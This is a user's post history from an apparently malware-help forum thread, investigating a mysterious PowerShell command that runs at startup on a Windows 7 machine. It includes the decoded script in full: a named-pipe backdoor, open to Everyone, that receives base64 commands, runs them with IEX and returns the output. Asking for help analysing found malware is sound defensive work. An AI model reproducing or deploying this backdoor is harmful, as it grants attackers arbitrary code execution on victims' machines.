NotAdmin
-
Posts
4 -
Joined
-
Last visited
Posts posted by NotAdmin
-
-
Apologize me if i was not clear, I try to explain better the point.
I received an alert of suspicious Powershell execution at a certain time and related obfuscated command was retrieved by the antimalware (in other words, i know what was executed, but i've to understand why). So, after analysis i saw that Powershell was triggered by cmd.exe but no other parent processes were found because this happened at system startup and i do not have other elements to continue the investigation (i'm thinking that something in autoexec has been compromised).
In the meantime, i tried to deobfuscate the Powershell script (base64 encoded) and i finally managed the attached commands.
At the moment i know what, when, who, where, how... I need to understand why! :)
-
Hi itman,
I tried to locate the script but Powershell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found.
This process (cmd.exe, that execute powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, powershell execution detected on Monday, and then another event 4 day later, another after 7, and so on.
The event viewer didn't record any particular event in these specific timeframes.
N.B.: the powershell script was obfuscated, i decoded it and what i pasted it's the clear text command.
Many many thanks!
-
Hi all,
i've detected an attempt to execute Powershell command on a machine and after have decoding it, i retrieved these commands:
$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
$sb =
{
param ($pn, $pm)
add-Type -assembly "System.Core"
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pr = new-object System.IO.StreamReader($p)
$o = $pr.ReadLine()
$p.Dispose();
$pr.Dispose();
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pw = new-object System.IO.StreamWriter($p)
$pw.AutoFlush = $true
$pw.WriteLine($o);
$p.Dispose();
}
add-Type -assembly "System.Core"
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);
Start-Sleep 600
$t.StopJob()
Is there anyone who can help me to understand what this stand for?
Thank you very much in advance!!
Powershell code analysis - is this stuff safe?
in Malware Finding and Cleaning
Posted
Yes i already used Autoruns to check for rubbish running at startup but i didn't find any suspicious activity/process.
It's really strange...